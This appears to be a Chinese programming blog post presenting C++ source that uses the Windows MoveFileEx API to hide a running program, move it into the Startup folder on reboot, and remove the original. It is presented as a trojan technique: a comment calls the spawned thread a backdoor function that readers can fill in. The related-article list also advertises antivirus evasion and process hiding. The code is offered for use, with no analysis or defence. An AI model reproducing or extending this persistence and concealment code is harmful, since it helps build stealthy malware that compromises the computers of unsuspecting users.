利用API函数MoveFileEx实现程序的隐藏、自启动与自删除

最新推荐文章于 2019-07-23 21:01:32 发布
最新推荐文章于 2019-07-23 21:01:32 发布
阅读量1.3k 收藏
点赞数
分类专栏: VC++ 
#include "stdafx.h"
#include <stdio.h>
#include <ShellAPI.h>
#include <ShlObj.h>
#include <atlstr.h>
//http://www.cnblogs.com/yincheng01/archive/2010/12/17/2213190.html
void usage(char *);
int StartShell(LPVOID lParam)
{

	ShellExecute(NULL,"open","http://www.qq.com/",NULL,NULL,0);
	return 0;
}

#pragma comment(linker,"/SUBSYSTEM:WINDOWS")

int WINAPI WinMain(
				   HINSTANCE hInstance,  // handle to current instance
				   HINSTANCE hPrevInstance,  // handle to previous instance
				   LPSTR lpCmdLine,      // pointer to command line
				   int nCmdShow          // show state of window
				   )
{
	LPITEMIDLIST pidl;
	LPMALLOC pShellMalloc;
	char szDir[200];
	if(SUCCEEDED(SHGetMalloc(&pShellMalloc)))
	{
		if(SUCCEEDED(SHGetSpecialFolderLocation(NULL,CSIDL_STARTUP,&pidl))) {
			// 如果成功返回true
			SHGetPathFromIDList(pidl, szDir);
			pShellMalloc->Free(pidl);
		}
		pShellMalloc->Release();
	}
	//::MessageBox (NULL,szDir,"Path",MB_OK);
	//::MessageBox(NULL,"I'm Hear","test",MB_OK);
	/**得到启动目录 
	char szPath[100]={0};
	::GetSystemDirectory(szPath,MAX_PATH);
	char szDst[100]={0};
	for (int i=0; i<3;i++)
		szDst[i]=szPath[i];
	strcat(szDst,"Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\FUCK.EXE");*/
	strcat(szDir,"\\FUCK.EXE");
	CString str;
	str.Format("%s",szDir);
	str.Replace("Start Menu\\Programs\\Startup\\","「开始」菜单\\程序\\启动\\");
	OutputDebugString(str);
	//::MessageBox (NULL,str,"Path",MB_OK);
	if(!PathFileExists("c:\\RECYCLER"))
	{

		CreateDirectory("c:\\RECYCLER",NULL);
	}

	//得到当前程序名
	TCHAR szCurPath[MAX_PATH];  
	memset(szCurPath,   0,   MAX_PATH);   
	GetModuleFileName(NULL,   szCurPath,   sizeof(szCurPath)/sizeof(TCHAR));
	if (!(MoveFileEx(szCurPath,"c:\\RECYCLER\\FK.BAK",MOVEFILE_REPLACE_EXISTING)))//若是要在不同的volume下移动文件,需要此项COPY_ALLOWED
		//printf("第一次移动失败/n");
		::MessageBox(NULL,"第一次移动文件失败","test",MB_OK); 
	if(!::MoveFileEx("c:\\RECYCLER\\FK.BAK",str,MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING))
	{ 
		::MessageBox(NULL,"移动文件失败","test",MB_OK); 
	}
	else printf("任务完成/n");
	/*system("pause");*/
	//创建并等待线程 
	//StartShell 为后门线程函数,大家可以自己实现相应的功能
	HANDLE hthread=::CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)StartShell,(LPVOID)NULL,NULL,NULL);
	CloseHandle(hthread);
	::WaitForSingleObject(hthread,INFINITE);
	OutputDebugString("ok");
	return 0;
}
void usage(char * s)
{
	printf(" 用法:MoveFile 原文件名 移动后的文件名/n" );

}

yunshouhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于VC++2010利用API函数MoveFileEx实现程序隐藏自启动与自删除
尹成的技术博客
12-17 5359
<br /> <br />详细代码如下<br />#include "stdafx.h" //#include "shell.h" void usage(char *); #pragma comment(linker,"/SUBSYSTEM:WINDOWS") int WINAPI WinMain( HINSTANCE hInstance, // handle to current instance HINSTANCE hPrevInstance, // hand
VB自启动过任何杀软
07-29
部分内容:该部分内容涉及到使用VB编程语言,通过调用Windows API函数MoveFileEx和MoveFile实现程序在系统重启时自动移动到指定位置并启动,从而达到绕过杀毒软件(如360安全卫士)监控的目的。代码中定义了两个...
API函数MoveFileEx使用详解
热门推荐
Augusdi的专栏
08-21 1万+
{ 函数原型 }BOOL MoveFileEx(  lpExistingFileName: PChar;  // 来源文件名,指向一个以零结尾的字符串的指针。  lpNewFileName: PChar;       // 目标文件名,指向一个以零结尾的字符串的指针。  dwFlags: DWORD              // 移动标记,见定义  ): BOOL; stdcall;
利用MoveFileEx实现程序隐藏自启动与自删除
FreshMan
09-30 4582
摘要:程序自启动与自删除几乎是所有后门或者木马所必须具备的功能。程序实现自启动的方法有很多种,最常见的方法莫过于写注册表,添加服务,或者将自身复制到启动目录。自删除通常的办法是写批处理。但是这些方法都已经众所周知,均被各杀毒软件、防护软件,主动防御软件以及经验丰富的管理员视为可疑行为。本文利用API函数MoveFileEx的dwFlags参数实现了上述功能,并且具有一定的隐蔽性。 一、了解Mo
ring0驱动级 隐藏进程 的源代码_在驱动层通过替换ssdt地址表中的api函数隐藏进程
01-25
ring0驱动级 隐藏进程 的源代码_在驱动层通过替换ssdt地址表中的api函数隐藏进程
Delphi moveFileEx文件移动示例.rar
07-10
Delphi移动文件,其实就是模拟了剪切文件再粘贴文件的效果,比较简单的例子,核心的代码也没几行:   begin moveFileEx(pchar(OpenDialog1.FileName),pchar('C:\' extractfilename(opendialog1.FileName)),MOVEFILE_COPY_ALLOWED);    showmessage('文件已移动到C盘跟目录下');   end   else    showmessage('无法复制文件');   end;   需要更完整的代码,请下载本Delphi文件移动源码包。
利用API函数SHFileOperationA实现文件操作
05-27
在Windows编程中,API(应用程序接口)是操作系统提供给开发者用于控制操作系统功能的函数集合。在本主题中,我们关注的是API函数`SHFileOperationA`,它是一个强大的工具,可以执行多种文件操作,如复制、移动和...
精选_使用MoveFileEx函数实现重启删除文件_源码打包
03-07
`MoveFileEx`函数是Windows API中处理文件移动和重命名的一个强大工具,它具有多个可选标志,其中一个就是`MOVEFILE_DELAY_UNTIL_REBOOT`,这个标志使得文件在下次系统启动时才进行移动或删除操作,这样即使文件被...
Windows路径操作API函数.zip_Windows路径操作API函数
09-24
在Windows操作系统中,路径操作是程序与文件系统交互的基础,涉及文件和目录的创建、删除、复制、移动等操作。Windows API(应用程序接口)提供了丰富的函数来处理这些任务。本资料主要介绍了几个常用的Windows路径...
易语言进程隐藏源代码
11-19
程序未经任何加密处理,纯源代码,其潜藏的功能要自己去开发!
Delphi源码免杀之(自删除)函数改写过卡巴高启发
08-05
删除通常通过调用Windows API中的`DeleteFile`或`MoveFileEx`函数实现。 然而,现代杀毒软件,如卡巴斯基,采用高度智能化的启发式分析技术,能够识别出这些常规的自删除行为。因此,为了绕过这些检测,开发者...
使用MoveFileEx函数实现重启删除文件
demongwc的博客
07-23 598
背景 在使用一些管理监控软件的时候,都会发现这些软件里都会提供这样的一个功能:重启删除文件。也就是,让计算机重启之后,立马删除文件。删除发生在AUTOCHK执行之后,在页面文件创建之前。而此时用户还没有完全的进入操作系统,所以可以应用这点删除那些正常情况下很难删除的文件甚至是页面文件。 起初,我还以为这种技术实现起来很难。想不明白如何设置重启之后,程序会自动删除指定文件,是将信息存储在注册表里...
逆向工程核心原理读书笔记-API钩取之隐藏进程(一)
liujiayu2的专栏
06-09 1341
我们通过一个示例来练习在ProcExp.exe和taskmgr.exe中隐藏进程。钩取前后的原理图如下所示。 下面我们先测试一下代码。关于代码的使用很简单,就不再多说了。 我们来分析一下源代码,看看是怎么实现的。 HideProc.cpp [cpp] view plain copy #include "win
基于VC++2010利用API函数MoveFileEx实现程序隐藏 自启动与自删除
fdgugfv的博客
02-01 213
基于VC++2010利用API函数MoveFileEx实现程序隐藏 自启动与自删除
开题报告达达宠物认领信息网站的设计与实现 已通过开题答辩的.docx
最新发布
07-25
宠物认领信息网站的主要目的是为寻找宠物的失主和寻找新家的宠物提供一个在线的信息交流平台。通过这个平台,失主可以发布失宠信息,寻找走失或遗弃的宠物;而救助人或组织则可以发布待领养的宠物信息,为那些无家可归的宠物寻找一个永久的归宿。 这样的网站通常会提供一个详细的宠物数据库,包括照片、品种、年龄、健康状况等信息,以便让失主能够方便地找到自己的宠物。同时,网站还会提供一些相关的服务,如失主与救助人之间的在线交流、宠物匹配推荐、领养手续办理等,以帮助双方顺利完成宠物的认领和领养过程。 宠物认领信息网站的目的在于提高失宠找到宠物的几率,减少流浪宠物的数量,并为那些无家可归的宠物提供一个温馨的新家。同时,网站还能促进社会对流浪宠物的关注和保护,提高人们的动物保护意识。
MoveFileEx
05-28
`MoveFileEx`是Windows系统API中的一个函数,用于移动或重命名文件或目录。其函数原型如下: ```c++ BOOL MoveFileEx( LPCTSTR lpExistingFileName, // 原文件或目录名称 LPCTSTR lpNewFileName, // 新文件或目录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值